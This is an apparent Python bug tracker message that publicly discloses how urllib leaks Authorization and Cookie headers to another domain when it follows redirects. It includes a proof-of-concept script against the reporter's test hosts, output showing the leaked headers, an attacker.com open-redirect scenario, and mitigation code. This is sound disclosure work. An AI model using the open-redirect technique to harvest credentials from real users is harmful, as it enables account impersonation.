
Author artem.smotrakov
Recipients alex, artem.smotrakov
Date 2018-05-27.14:20:06
Content
After a discussion on [email protected], it was decided to disclose this report publicly. Here is the original report:




Hello Python Security Team,

It looks like urllib may leak sensitive HTTP headers to third parties when handling redirects.

Let's consider the following environment:
- http://httpleak.gypsyengineer.com/index.php asks a user to authenticate via the HTTP Basic authentication scheme
- http://httpleak.gypsyengineer.com/redirect.php?url=<url> is an open redirect which returns a 301 status code and redirects the client to the specified URL
- http://headers.gypsyengineer.com just prints out all HTTP headers which the client sent

Let's then consider the following scenario:
- create an instance of urllib.request.Request for 'http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com'
- call the urllib.request.Request.add_header() method to set the Authorization and Cookie headers
- call urllib.request.urlopen() to open the connection

Here is what happens next:
- urllib sends the Authorization and Cookie headers to httpleak.gypsyengineer.com, as expected
- redirect.php returns a 301 status code which redirects to headers.gypsyengineer.com (note that httpleak.gypsyengineer.com and headers.gypsyengineer.com are different domains)
- urllib processes the 301 response and makes a request to http://headers.gypsyengineer.com

The problem is that urllib sends the Authorization and Cookie headers to http://headers.gypsyengineer.com as well.

Let's imagine that a user is authenticated on a web site via one of the HTTP authentication schemes (Basic, Digest, NTLM, SPNEGO/Kerberos),
and the web site has an open redirect like http://httpleak.gypsyengineer.com/redirect.php.
If an attacker can trick the user into opening http://httpleak.gypsyengineer.com/redirect.php?url=http://attacker.com,
then urllib is going to send the sensitive headers to http://attacker.com, where the attacker can collect them.
As a result, the attacker can impersonate the user on the original web site.
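
For comparison, a caller can already keep a header off redirected requests by setting it with Request.add_unredirected_header() instead of add_header(). The sketch below only illustrates that existing API; it does not change what happens to headers set with add_header(), and it opens no connection.

```python
import urllib.request

req = urllib.request.Request("http://httpleak.gypsyengineer.com/index.php")

# Headers added this way are stored separately from req.headers and are
# not copied onto the new request that urllib builds for a redirect.
req.add_unredirected_header("Authorization", "Basic YWRtaW46dGVzdA==")
req.add_unredirected_header("Cookie", "This is only for httpleak.gypsyengineer.com")

print(req.headers)            # regular headers (copied on redirect)
print(req.unredirected_hdrs)  # headers sent only with the original request
```

This relies on every caller remembering to use the right method, so it is a workaround rather than a fix for the default behavior.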

Here is a simple POC which shows the problem:

import urllib.request

# Credentials intended only for httpleak.gypsyengineer.com
req = urllib.request.Request('http://httpleak.gypsyengineer.com/redirect.php?url=http://headers.gypsyengineer.com')
req.add_header('Authorization', 'Basic YWRtaW46dGVzdA==')
req.add_header('Cookie', 'This is only for httpleak.gypsyengineer.com')
# urlopen() follows the 301 redirect to headers.gypsyengineer.com
with urllib.request.urlopen(req) as f:
    print(f.read(2048).decode("utf-8"))


Running this code results in loading http://headers.gypsyengineer.com, which prints out the Authorization and Cookie headers
that are supposed to be sent only to httpleak.gypsyengineer.com:

Hello, I am <b>headers.gypsyengineer.com</b></br></br>
Here are HTTP headers you just sent me:</br></br>
Accept-Encoding: identity</br>
User-Agent: Python-urllib/3.8</br>
<b>Authorization: Basic YWRtaW46dGVzdA==</br></b>
<b>Cookie: This is only for httpleak.gypsyengineer.com</br></b>
Host: headers.gypsyengineer.com</br>
Cache-Control: max-age=259200</br>
Connection: keep-alive</br>


I could reproduce it with Python 3.5.2 and with the latest build of https://github.com/python/cpython

If I am not missing something, it would be better if urllib filtered out sensitive HTTP headers while handling redirects.
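
One way such filtering could look on the application side is a custom redirect handler. This is only a rough sketch, not a patch for urllib: the class name StripSensitiveHeadersOnRedirect and the SENSITIVE_HEADERS set are made up for illustration, the header list is an assumption and not exhaustive, and "different host" is approximated by comparing the netloc part of the URLs.

```python
import urllib.request
from urllib.parse import urlsplit

# Assumption: an illustrative, non-exhaustive list of sensitive headers.
SENSITIVE_HEADERS = {"authorization", "cookie"}


class StripSensitiveHeadersOnRedirect(urllib.request.HTTPRedirectHandler):
    """Hypothetical handler: drop credentials when the redirect target
    has a different host (netloc) than the original request."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        # Let the stock handler build the follow-up request first.
        new_req = super().redirect_request(req, fp, code, msg, headers, newurl)
        if new_req is None:
            return None
        old_host = urlsplit(req.full_url).netloc.lower()
        new_host = urlsplit(newurl).netloc.lower()
        if old_host != new_host:
            # Request stores header names capitalized, so compare lowercased.
            for name in list(new_req.headers):
                if name.lower() in SENSITIVE_HEADERS:
                    new_req.remove_header(name)
        return new_req


# Passing the subclass replaces the default HTTPRedirectHandler.
opener = urllib.request.build_opener(StripSensitiveHeadersOnRedirect)
```

With this opener, opener.open(req) would be used in place of urllib.request.urlopen(req) in the POC above. Comparing netloc treats a change of port as a different host, which is a deliberately strict choice for this sketch.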

Please let me know if I wrote anything dumb and stupid, or if you have any questions :) Thanks!

Artem
History
Date                 User             Action  Args
2018-05-27 14:20:06  artem.smotrakov  set     recipients: + artem.smotrakov, alex
2018-05-27 14:20:06  artem.smotrakov  set     messageid: <[email protected]>
2018-05-27 14:20:06  artem.smotrakov  link    issue33661 messages
2018-05-27 14:20:06  artem.smotrakov  create